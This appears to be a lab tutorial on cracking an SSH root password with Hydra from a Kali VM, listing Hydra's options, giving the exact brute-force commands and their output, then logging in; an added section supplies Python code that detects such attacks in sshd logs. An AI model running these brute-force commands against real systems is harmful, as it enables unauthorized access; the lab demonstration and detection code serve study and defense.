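Hydra is a powerful brute-force password cracking tool. It supports online password cracking for almost all protocols, such as FTP, HTTP, HTTPS, MySQL, MS SQL, Oracle, Cisco, IMAP and VNC. Whether a password can be cracked depends mainly on whether the dictionary is strong enough. The following demonstrates basic use of hydra.
Preparation
One CentOS virtual machine: IP 192.168.xx.xx, account root, password 1234 (target)
One Kali virtual machine (host)
A set of brute-force dictionaries (an account dictionary and a password dictionary)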
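Parameter overview
Main hydra options
-R Restore a previously aborted/crashed session
-S Connect using SSL (Secure Socket Layer)
-s PORT Specify the port when the service listens on a non-default port
-l LOGIN Specify the login ID when it is already known
-L FILE Specify the file of login IDs to try when the login ID is not known (the full path is required)
-p PASS Specify the login password when it is already known
-P FILE Specify the file of passwords to try when the password is not known (the full path is required)
-x MIN:MAX:CHARSET Instead of a file, generate passwords that match the given character set and minimum and maximum length, and try those
-C FILE Specify a file of colon-separated entries in ID:Password form
-M FILE Specify a file listing the servers to attack in parallel
-o FILE Write the results to FILE instead of STDOUT
-f Stop as soon as the first valid ID and password are found
-t TASKS Specify the number of parallel connections (default: 16)
-w Specify the wait time for each thread's response (default: 32 seconds)
-4/6 Use IPv4/IPv6 (default: IPv4)
-v/-V Show verbose output
-U Show usage details for a service module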
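Implementation
SSH uses port 22 by default.
As you can see, my desktop holds a password list, kouling.txt, and a username list, name.txt. The first demonstration covers the case where the username is known but the password is not, so only the password list kouling.txt is needed. Line 11 of the output shows login: root password: 1234 (this run is fairly fast).
The second demonstration covers the case where neither the username nor the password is known, so both lists are used. The eighth line from the end of the output shows login: root password: 1234 (this run is very slow).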
┌──(root💀kali)-[~/桌面]
└─# ls
kouling.txt name.txt
┌──(root💀kali)-[~/桌面]
└─# hydra -l root -P kouling.txt ssh://192.168.xx.xx:22/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-03 17:54:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2105 login tries (l:1/p:2105), ~132 tries per task
[DATA] attacking ssh://192.168.xx.xx:22/
[22][ssh] host: 192.168.xx.xx login: root password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-03 17:54:14
┌──(root💀kali)-[~/桌面]
└─# hydra -L name.txt -P kouling.txt ssh://192.168.xx.xx:22/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-03 18:03:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2105 login tries (l:1/p:2105), ~132 tries per task
[DATA] attacking ssh://192.168.xx.xx:22/
[22][ssh] host: 192.168.xx.xx login: root password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-03 18:03:48
┌──(root💀kali)-[~/桌面]
└─#
Verify the login: the prompt changes from (root💀kali) to [root@master ~]#, so the login succeeded. During the login, just enter yes and the password.
┌──(root💀kali)-[~/桌面]
└─# ssh root@192.168.xx.xx
The authenticity of host '192.168.xx.xx (192.168.xx.xx)' can't be established.
ECDSA key fingerprint is SHA256:ZWvLiyQQ6RAcqo4qBrrmAlQhFEOR3psaP6NufbK8TLw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.xx.xx' (ECDSA) to the list of known hosts.
root@192.168.xx.xx's password:
Last login: Sun Oct 3 17:41:20 2021
[root@master ~]#
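On the target, runs like the two above show up in the sshd log as a burst of failed logins from one source address followed by an accepted login. The following is an added example, not part of the original post: it flags source IPs that reach a failure threshold inside a time window and records which accounts they then logged in to. The log lines are constructed in the format sshd writes to /var/log/secure on CentOS, and the function name `detect_bruteforce`, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the sshd format of /var/log/secure on CentOS (not real logs).
SAMPLE_LOG = """\
Oct  3 17:54:10 master sshd[2101]: Failed password for root from 192.0.2.10 port 40122 ssh2
Oct  3 17:54:10 master sshd[2102]: Failed password for root from 192.0.2.10 port 40124 ssh2
Oct  3 17:54:11 master sshd[2103]: Failed password for root from 192.0.2.10 port 40126 ssh2
Oct  3 17:54:11 master sshd[2104]: Failed password for invalid user admin from 192.0.2.10 port 40128 ssh2
Oct  3 17:54:12 master sshd[2105]: Failed password for root from 192.0.2.10 port 40130 ssh2
Oct  3 17:54:13 master sshd[2106]: Accepted password for root from 192.0.2.10 port 40132 ssh2
Oct  3 18:20:01 master sshd[2200]: Failed password for alice from 192.0.2.50 port 51000 ssh2
Oct  3 18:20:09 master sshd[2200]: Accepted password for alice from 192.0.2.50 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2021):
    """Return {ip: {"max_failures": n, "compromised": [users]}} for flagged IPs."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"max_failures": 0, "compromised": []})
                a["max_failures"] = max(a["max_failures"], len(q))
        elif ip in alerts and user not in alerts[ip]["compromised"]:
            # A success from an already-flagged IP means one of the guesses worked.
            alerts[ip]["compromised"].append(user)
    return alerts
```

A non-empty "compromised" list for an address is the case to escalate: the account's password was guessed and should be treated as exposed.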